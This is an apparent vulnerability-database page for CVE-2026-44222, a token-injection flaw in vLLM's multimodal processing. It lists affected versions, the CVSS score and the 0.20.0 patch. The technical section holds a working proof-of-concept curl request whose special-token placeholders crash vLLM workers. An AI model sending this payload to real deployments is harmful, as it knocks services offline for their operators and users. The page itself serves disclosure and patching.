CVE-2026-44222

GHSA-hpv8-x276-m59f MEDIUM
Published May 5, 2026

## Summary This report explains a Token Injection vulnerability in vLLM’s multimodal processing. Unauthenticated, text-only prompts that spell special tokens are interpreted as control. Image and video placeholder sequences supplied without matching data cause vLLM to index into empty grids during...

Full CISO analysis pending enrichment.

Affected Systems

Package Ecosystem Vulnerable Range Patched
vllm pip >= 0.6.1, < 0.20.0 0.20.0
78.9K 126 dependents Pushed 2d ago 55% patched ~34d to patch Full package profile →

Do you use vllm? You're affected.

Severity & Risk

CVSS 3.1
6.5 / 10
EPSS
N/A
Exploitation Status
No known exploitation
Sophistication
N/A

Attack Surface

AV AC PR UI S C I A
AV Network
AC Low
PR Low
UI None
S Unchanged
C None
I None
A High

Recommended Action

Patch available

Update vllm to version 0.20.0

Compliance Impact

Compliance analysis pending. Sign in for full compliance mapping when available.

Frequently Asked Questions

What is CVE-2026-44222?

vLLM Vulnerable to Remote DoS via Special-Token Placeholders

Is CVE-2026-44222 actively exploited?

No confirmed active exploitation of CVE-2026-44222 has been reported, but organizations should still patch proactively.

How to fix CVE-2026-44222?

Update to patched version: vllm 0.20.0.

What is the CVSS score for CVE-2026-44222?

CVE-2026-44222 has a CVSS v3.1 base score of 6.5 (MEDIUM).

Technical Details

NVD Description

## Summary This report explains a Token Injection vulnerability in vLLM’s multimodal processing. Unauthenticated, text-only prompts that spell special tokens are interpreted as control. Image and video placeholder sequences supplied without matching data cause vLLM to index into empty grids during input-position computation, raising an unhandled IndexError and terminating the worker or degrading availability. Multimodal paths that rely on `image_grid_thw`/`video_grid_thw` are affected. Severity: High (remote DoS). Reproduced on vLLM 0.10.0 with Qwen2.5-VL. ## Details - Affected component: multimodal input position computation. - File/functions (paths are indicative): - vllm/model_executor/layers/rotary_embedding.py - get_input_positions_tensor(...) - _vl_get_input_positions_tensor(...) - Failure mechanism: - The code counts detected vision tokens and then indexes video_grid_thw/image_grid_thw accordingly. - When user input carries placeholder tokens but no actual multimodal payload, these grids are empty. The code does not bounds-check before indexing. Representative snippet (context): ```python # vllm/model_executor/layers/rotary_embedding.py @classmethod def _vl_get_input_positions_tensor( cls, input_tokens, hf_config, image_grid_thw, video_grid_thw, ..., ): # detect video tokens video_nums = (vision_tokens == video_token_id).sum() # later in processing t, h, w = ( video_grid_thw[video_index][0], # IndexError if no video data video_grid_thw[video_index][1], video_grid_thw[video_index][2], ) ``` Abbreviated call path: ``` OpenAI API request → vllm.v1.engine.core: step/execute_model → vllm.v1.worker.gpu_model_runner: _update_states/execute_model → vllm.model_executor.layers.rotary_embedding: get_input_positions_tensor → _vl_get_input_positions_tensor → IndexError: list index out of range ``` ## PoC ### Environment - vLLM: 0.10.0 - Model: Qwen/Qwen2.5-VL-3B-Instruct - Launch server: ```bash python -m vllm.entrypoints.openai.api_server \ --model Qwen/Qwen2.5-VL-3B-Instruct \ --port 8000 ``` ### Request (text-only, no image/video data) ```bash cat > request.json <<'JSON' { "model": "Qwen/Qwen2.5-VL-3B-Instruct", "messages": [ { "role": "user", "content": [ { "type": "text", "text": "what's in picture <|vision_start|><|image_pad|><|vision_end|>" } ] } ] } JSON curl -s http://127.0.0.1:8000/v1/chat/completions \ -H 'Content-Type: application/json' \ --data @request.json ``` ### Observed result - HTTP 500; logs show IndexError: list index out of range from _vl_get_input_positions_tensor(...). - In some deployments, the worker exits and capacity remains reduced until manual restart. ## Impact - Type: Token Injection leading to Remote Denial of Service (unauthenticated). A single request can trigger the fault. - Scope: Any vLLM deployment that serves VLMs and accepts raw user text via OpenAI-compatible endpoints (self-hosted or proxied/managed fronts). - Effect: Request → unhandled exception in position computation → worker termination / service unavailability. ## Fixes * Changes associated with https://github.com/vllm-project/vllm/issues/32656 ## Credits Pengyu Ding (Infra Security, Ant Group) Ziteng Xu (Infra Security, Ant Group)

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H

Timeline

Published
May 5, 2026
Last Modified
May 5, 2026
First Seen
May 6, 2026

Related Vulnerabilities